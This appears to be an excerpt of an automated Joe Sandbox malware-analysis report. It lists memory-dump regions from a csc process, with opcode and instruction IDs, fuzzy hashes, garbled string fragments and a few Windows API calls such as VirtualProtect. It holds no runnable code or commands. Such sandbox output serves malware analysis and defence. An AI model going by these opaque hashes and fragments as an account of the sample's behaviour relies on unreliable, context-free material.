                                                                                                                                                      • Instruction Fuzzy Hash: 71E13F34A00209DFCB14EFA4D49499EBBB2EF89314F50C569E906AB365DB30EC46CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 58e46998d41605116409e55f56cb50937e9083b39f692ed1e8b118f26a385576
                                                                                                                                                      • Instruction ID: 3e89e8282fa5fa381601f7f48bfe97c66a941cfc377c08126cee8718953da1d1
                                                                                                                                                      • Opcode Fuzzy Hash: 58e46998d41605116409e55f56cb50937e9083b39f692ed1e8b118f26a385576
                                                                                                                                                      • Instruction Fuzzy Hash: 5E02DDB4F402168BFBB53669296573B2D97EBC8645F0550ACDA06DB3C4DE20EC4287E3

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $]q$$]q
                                                                                                                                                      • API String ID: 0-127220927
                                                                                                                                                      • Opcode ID: 75ea1fff08afd4284b530f842e6e52adfec7aa0d3a76f0be98b9bb9d9633865f
                                                                                                                                                      • Instruction ID: 90667578c155a36f78424a97ff199e05171a839f01768d4e44587bd276e542b0
                                                                                                                                                      • Opcode Fuzzy Hash: 75ea1fff08afd4284b530f842e6e52adfec7aa0d3a76f0be98b9bb9d9633865f
                                                                                                                                                      • Instruction Fuzzy Hash: 38226C35A002198FCB15DFA4C855AAEBBB2FF58710F168015E851E73A4DB78AE43CF91

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$d
                                                                                                                                                      • API String ID: 0-3557608343
                                                                                                                                                      • Opcode ID: f942e95b7beecf6fce1e9c1cd742f6c7d18dab7f3a0904a638a5fcf8e0caf7db
                                                                                                                                                      • Instruction ID: e4dcf8a612a67f5267fe2f49d88d41d930193d9334938baa8853aa4963b686dd
                                                                                                                                                      • Opcode Fuzzy Hash: f942e95b7beecf6fce1e9c1cd742f6c7d18dab7f3a0904a638a5fcf8e0caf7db
                                                                                                                                                      • Instruction Fuzzy Hash: 40D16B346006068FCB14DF68C48496ABBF2FF88358B15C569E85A9B765DB30FC46CF90

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Pl]q$$]q
                                                                                                                                                      • API String ID: 0-2369359564
                                                                                                                                                      • Opcode ID: 0d5ac967bc9ba707965ccc50af73423ae929cfd8b178a2babe980effd5cf75bb
                                                                                                                                                      • Instruction ID: 6d9e4b00c699a29373e548c236bc3a655e0d61e94560feb14d1e95cf64095cf2
                                                                                                                                                      • Opcode Fuzzy Hash: 0d5ac967bc9ba707965ccc50af73423ae929cfd8b178a2babe980effd5cf75bb
                                                                                                                                                      • Instruction Fuzzy Hash: 91B11874B001098FDB14EF69C894A6A7BF6FF89710B1180A9E506CB3B5DB71EC41CBA1

Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 1903b54c5357605485c36e3b7cd960909de3498109e1f62e63c16b4107cbb7cd
                                                                                                                                                      • Instruction ID: 88e0da272d58a1c5973f2dc1597334dc30064b6e4ca9ee9eb3584bbf78932743
                                                                                                                                                      • Opcode Fuzzy Hash: 1903b54c5357605485c36e3b7cd960909de3498109e1f62e63c16b4107cbb7cd
                                                                                                                                                      • Instruction Fuzzy Hash: BAC1A675A00218DFCB04EFA8C994A9DB7B6FF89304F118169E506AB3A5DB71EC42CF51

Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 67e7994088f6c5687595c923ac1f7f3175c9595debe40d78ab09e32fa8e65395
                                                                                                                                                      • Instruction ID: 8d69716da753a13ba3210837d75ba9ba1fc965c8ff1f9abae427b4b80ea685e1
                                                                                                                                                      • Opcode Fuzzy Hash: 67e7994088f6c5687595c923ac1f7f3175c9595debe40d78ab09e32fa8e65395
                                                                                                                                                      • Instruction Fuzzy Hash: 66C1C875A00218DFCB04EFA4C994AADB7B6FF89305F118168E506AB3A5DB71EC42CF51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 7f9c75edd50863ea73ace3e24ae1a3713779d6e534efe9d33c409917d1937a61
                                                                                                                                                      • Instruction ID: 5e2e50437677a44f6d15b226db769044bd3fb6b3162d5c8f5b03a6069a6fda84
                                                                                                                                                      • Opcode Fuzzy Hash: 7f9c75edd50863ea73ace3e24ae1a3713779d6e534efe9d33c409917d1937a61
                                                                                                                                                      • Instruction Fuzzy Hash: CC61E3307046554FCB26AE39C82466F7BF2AF85304F28856DE446DB2A5DB34DD05CBA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$,aq
                                                                                                                                                      • API String ID: 0-1929014441
                                                                                                                                                      • Opcode ID: 5db4893c009700962306396032d05b3ab0e6596898c4a1ebdfbd35b1de51dd13
                                                                                                                                                      • Instruction ID: 5b3a329277d0e10ac22ab9429ba5f8c03ab4833ca092bfabc90fef6dc5be9543
                                                                                                                                                      • Opcode Fuzzy Hash: 5db4893c009700962306396032d05b3ab0e6596898c4a1ebdfbd35b1de51dd13
                                                                                                                                                      • Instruction Fuzzy Hash: 3E41C5327041596FDF029EE99C508FF7FEEEF89210B04406AFA45E3251CA25DD159BB1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 79f94a0422c86a0535d2c02c90029068e37ef32c82b3a00a61fa171abe61d07a
                                                                                                                                                      • Instruction ID: ceaec94202af5375e0aca6ece9216f26840a16c80180c8e029e0e752f1e783c7
                                                                                                                                                      • Opcode Fuzzy Hash: 79f94a0422c86a0535d2c02c90029068e37ef32c82b3a00a61fa171abe61d07a
                                                                                                                                                      • Instruction Fuzzy Hash: 805177307406058FC759BF69C86496E77B3AF893447608468E9469B3A4DF35ED02CBA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 4799dbe120f0d190bf0d31c1e88bbd650fef97658b91250a874ed257c8e11a85
                                                                                                                                                      • Instruction ID: e2a3eb9b9de15a83c69b65894169da5cc77cf45ec10e182a9f71f9a8e2d80cec
                                                                                                                                                      • Opcode Fuzzy Hash: 4799dbe120f0d190bf0d31c1e88bbd650fef97658b91250a874ed257c8e11a85
                                                                                                                                                      • Instruction Fuzzy Hash: 344106712047458FD335EF3AC45035ABBE2EF85310F158D69E4868BBA1DB78E846CBA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$paq
                                                                                                                                                      • API String ID: 0-4101361271
                                                                                                                                                      • Opcode ID: e1674ed9777e3861326635e67872096777e98ab5e96f723e7e86522c6aaa14e1
                                                                                                                                                      • Instruction ID: c8cdcf2a3838721891b2eca7a0db1714b03587ff75af43b8497f35e15874bbd6
                                                                                                                                                      • Opcode Fuzzy Hash: e1674ed9777e3861326635e67872096777e98ab5e96f723e7e86522c6aaa14e1
                                                                                                                                                      • Instruction Fuzzy Hash: AB41C270A003069FC715DF68C8406AEBBA6FF88304F60882CE54A9B655DB75AD468BA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 2
                                                                                                                                                      • API String ID: 0-450215437
                                                                                                                                                      • Opcode ID: 978acc600437ce2798f3f27524ec61f7715a4ca8d8e56d96b27eec0b6acc469a
                                                                                                                                                      • Instruction ID: 4f5fe9972ab70086570df5540ccccfa6cca08b3174eccd60309bd3429278bb15
                                                                                                                                                      • Opcode Fuzzy Hash: 978acc600437ce2798f3f27524ec61f7715a4ca8d8e56d96b27eec0b6acc469a
                                                                                                                                                      • Instruction Fuzzy Hash: 87522D70A00205CFDB64EF68D894A9EBBF2FF49350F1084A9E90A9B355DB349D86CF51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_]q
                                                                                                                                                      • API String ID: 0-188044275
                                                                                                                                                      • Opcode ID: 0795a96d40c0c3db25802151117016bd56619214830b5359ef9ffd5d44143dc4
                                                                                                                                                      • Instruction ID: 880aee3a6388a53a5d002f755a2555932e32b870423305346d4959c0fe1b9768
                                                                                                                                                      • Opcode Fuzzy Hash: 0795a96d40c0c3db25802151117016bd56619214830b5359ef9ffd5d44143dc4
                                                                                                                                                      • Instruction Fuzzy Hash: B7226C35A00204DFDB14DFA9D890AADBBF6FF88314F158069E9059B3A5DB71EC42CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0505F6EC
Memory Dump Source
• Source File: 00000003.00000002.4045555224.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5050000_csc.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: TJbq
                                                                                                                                                      • API String ID: 0-1760495472
                                                                                                                                                      • Opcode ID: a1a038a5ff2313cf2e14f0edc03a8514375fb86f68325a4456cdb46b6357fee4
                                                                                                                                                      • Instruction ID: e4ab7894c21ada892a1ca2f8e20a444a21170dce95e3fb3d1c40804682816dc6
                                                                                                                                                      • Opcode Fuzzy Hash: a1a038a5ff2313cf2e14f0edc03a8514375fb86f68325a4456cdb46b6357fee4
                                                                                                                                                      • Instruction Fuzzy Hash: EC316E353002108FD724EF79D498F2AB7E5EF89765F1500A9E90ACB7B2CA65EC018B91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: c60aa0589dcdd391a884fbb471f66f757c2dfeb0c63f46aa76dbed9def40ca26
                                                                                                                                                      • Instruction ID: 716de23a4e18fb8c7aa39acc664423ce2f0e3a23b94cfe0d772a46ec6a194d61
                                                                                                                                                      • Opcode Fuzzy Hash: c60aa0589dcdd391a884fbb471f66f757c2dfeb0c63f46aa76dbed9def40ca26
                                                                                                                                                      • Instruction Fuzzy Hash: 6331B135B00105AFCB09AFA4D898D9EBBB6FF88350B154069E6069B365CA31EC12CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: p<]q
                                                                                                                                                      • API String ID: 0-1327301063
                                                                                                                                                      • Opcode ID: 14b157583a8a1dba6b26a76e39bd3865417acbfedd1b93985bcb8f2e33e91cdc
                                                                                                                                                      • Instruction ID: 12f8ad04ed776386aa13cc724fae0d43cd5f64081b8da8df99f043f4a243f09e
                                                                                                                                                      • Opcode Fuzzy Hash: 14b157583a8a1dba6b26a76e39bd3865417acbfedd1b93985bcb8f2e33e91cdc
                                                                                                                                                      • Instruction Fuzzy Hash: 15215C753042449FCB058F2AC844DAA7BEAEF8A300B1680A6FD54CB276CA35DC51CB60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: p<]q
                                                                                                                                                      • API String ID: 0-1327301063
                                                                                                                                                      • Opcode ID: 2490d84a15166bb1fb46ae723715e5c73c810c5b6f487466f67c7dde332f8cd9
                                                                                                                                                      • Instruction ID: d6628cdcfc6b9e34bda9d3a0790c617d0e0f9ac8adf697cd999068ad42f0741e
                                                                                                                                                      • Opcode Fuzzy Hash: 2490d84a15166bb1fb46ae723715e5c73c810c5b6f487466f67c7dde332f8cd9
                                                                                                                                                      • Instruction Fuzzy Hash: D3213A753001559FCB05CF2AC840EAA7BEAAF89300B1580A6FD64CB375C675DC51CB60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ^j6
                                                                                                                                                      • API String ID: 0-3205939370
                                                                                                                                                      • Opcode ID: e0c5316a348603c9a5e6788c5a08132ac6b8a1ce8ae65f7aa3466f955e37aaf3
                                                                                                                                                      • Instruction ID: 83263b2e353be528c0068d71b5f5b51b39556510f2f2a259e6903e4989d6800c
                                                                                                                                                      • Opcode Fuzzy Hash: e0c5316a348603c9a5e6788c5a08132ac6b8a1ce8ae65f7aa3466f955e37aaf3
                                                                                                                                                      • Instruction Fuzzy Hash: 94210671A002098FCB04DF94C541ADDB7F2FF88304F2085A5E405BB2A5CB76AD45CFA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq
                                                                                                                                                      • API String ID: 0-600464949
                                                                                                                                                      • Opcode ID: a67447389f7f5a33b8370d16eb7f0938c272799bc2f4303868418cef32a8ffc8
                                                                                                                                                      • Instruction ID: 9c61b95ca5377cb9bf15e463eb5b0544ec39c027503ad4d4cfb49fa7ba38d9d3
                                                                                                                                                      • Opcode Fuzzy Hash: a67447389f7f5a33b8370d16eb7f0938c272799bc2f4303868418cef32a8ffc8
                                                                                                                                                      • Instruction Fuzzy Hash: DC11D336604204AFCB069F68D814C59BFB6EF8932031680D5F505DB272CB32DC26DF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .&4
                                                                                                                                                      • API String ID: 0-2251432316
                                                                                                                                                      • Opcode ID: 02c18214864d56de00d22e93b8ed24f3bbb11dbf34514c956b52f618082e4b47
                                                                                                                                                      • Instruction ID: 9c8d2fdabfa939532893c816e56be925f3450c1b0f66e34690eee798db80d265
                                                                                                                                                      • Opcode Fuzzy Hash: 02c18214864d56de00d22e93b8ed24f3bbb11dbf34514c956b52f618082e4b47
                                                                                                                                                      • Instruction Fuzzy Hash: 2701C0B17362178FCBA9BB39951092633E5AF8922032545B9F40ACB3B1EA20EC00CB50
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045555224.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_5050000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 68936252aa35d361ed1a4fba54d1020db7b9be4511cfb13d9095295f60a5558b
                                                                                                                                                      • Instruction ID: 66c316badf8375354061d94bb29bb5fef2103251b23ee2e682bb32647ea259bd
                                                                                                                                                      • Opcode Fuzzy Hash: 68936252aa35d361ed1a4fba54d1020db7b9be4511cfb13d9095295f60a5558b
                                                                                                                                                      • Instruction Fuzzy Hash: 9E113AB1D003498FCB10DFAAD4457EFFBF4EB89324F248419D419A7240CB796545CBA5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: affb2234cfb223dcc99bd920a87456ae4e8b486959b1eca4fa2a37554ac947b3
                                                                                                                                                      • Instruction ID: 3dfe80a6051914d14447f41eb36f9eacec628068a7a1d5ac43a8bae8918875a4
                                                                                                                                                      • Opcode Fuzzy Hash: affb2234cfb223dcc99bd920a87456ae4e8b486959b1eca4fa2a37554ac947b3
                                                                                                                                                      • Instruction Fuzzy Hash: 3B01F735B0E3948FF7662A2568246AA7F66EBC206170800EAD48187181DA285C02C7D2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0159dc4d1e27a6696ba465c7d19836bd6b33f93740f43df4e91472089741e21c
                                                                                                                                                      • Instruction ID: 1eec90a8c0f9e5c1e17acaed99790ea3224c8aa128cd7899d6db07a072921376
                                                                                                                                                      • Opcode Fuzzy Hash: 0159dc4d1e27a6696ba465c7d19836bd6b33f93740f43df4e91472089741e21c
                                                                                                                                                      • Instruction Fuzzy Hash: CD12D834A002198FCB14EF68C894B9DB7B2BF89300F51D5A8E54AAB365DB70ED85CF41
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 30c684a7c4103bda6ae100ed905aca1ba8675721836a8b1dfc3ae90ad391105e
                                                                                                                                                      • Instruction ID: 27f7824b440648bef2e27b930662700d396a88234fc1ced050b14c9eac23aecc
                                                                                                                                                      • Opcode Fuzzy Hash: 30c684a7c4103bda6ae100ed905aca1ba8675721836a8b1dfc3ae90ad391105e
                                                                                                                                                      • Instruction Fuzzy Hash: ED510670C25619CADB14EFA8C954AEDBBB0FF49300F10866DD449AB251EB749A88CF91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b7757202daaaf14296e2d6f5795f4ac2c825aa9d86a964715b6cd206039e6a12
                                                                                                                                                      • Instruction ID: b4d12d04eecec0283d3383d4c8d64bed5e235cb62b0b54eeda226608eb16b104
                                                                                                                                                      • Opcode Fuzzy Hash: b7757202daaaf14296e2d6f5795f4ac2c825aa9d86a964715b6cd206039e6a12
                                                                                                                                                      • Instruction Fuzzy Hash: 10411A38B00618CFDB556B75F65E22D3AA2EF89356B104468E807C7754EF3CAC468F46
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047906214.0000000009790000.00000040.00000800.00020000.00000000.sdmp, Offset: 09790000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9790000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4291ae3f662e204f3a120d9fe6c4a5ab5598a7df37e53c0f37df60ba738967a4
                                                                                                                                                      • Instruction ID: b4664115ae38d94f48f960dbd2a953e10239179fac451065a40d756bc4b1c5f4
                                                                                                                                                      • Opcode Fuzzy Hash: 4291ae3f662e204f3a120d9fe6c4a5ab5598a7df37e53c0f37df60ba738967a4
                                                                                                                                                      • Instruction Fuzzy Hash: A3414A71B10609DFCB24EBA9E854B5AB7B2FB89314F10C429E906DB390DB35EC42CB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e4c17d54b368d146f656ba5d47ac2f89cebc4dfba7d5fa0e1493b1eed0dcfcb1
                                                                                                                                                      • Instruction ID: e061083dd96ae8b6dc34ba20de6c6a40653fb25637aab44d445ede5ce7e3dab6
                                                                                                                                                      • Opcode Fuzzy Hash: e4c17d54b368d146f656ba5d47ac2f89cebc4dfba7d5fa0e1493b1eed0dcfcb1
                                                                                                                                                      • Instruction Fuzzy Hash: BA314A35A00118ABCB14DFA4E855AEEB7B6FF88354F20C025E805B73A4CB759D06CFA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 29635d0e926c55f050e3516b2f4b55200342f7c7aef3d6a2ec1f361c13eb9983
                                                                                                                                                      • Instruction ID: 5cc2b00fbfb9ffa380271b3957688dbab2d666b17df5915252470d6ee2ebb321
                                                                                                                                                      • Opcode Fuzzy Hash: 29635d0e926c55f050e3516b2f4b55200342f7c7aef3d6a2ec1f361c13eb9983
                                                                                                                                                      • Instruction Fuzzy Hash: AB315A31A01318EFD7319B2CD801BA6BBAAFB46711F054279E446CB312C7389C46CFA2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c7119714bf88b99a2bb91400e5a6841286e3015e6a9086de3f877740d0768596
                                                                                                                                                      • Instruction ID: c730f618d91bafe84f6d67e81db2944010344d5147891c0932201a66ddc25674
                                                                                                                                                      • Opcode Fuzzy Hash: c7119714bf88b99a2bb91400e5a6841286e3015e6a9086de3f877740d0768596
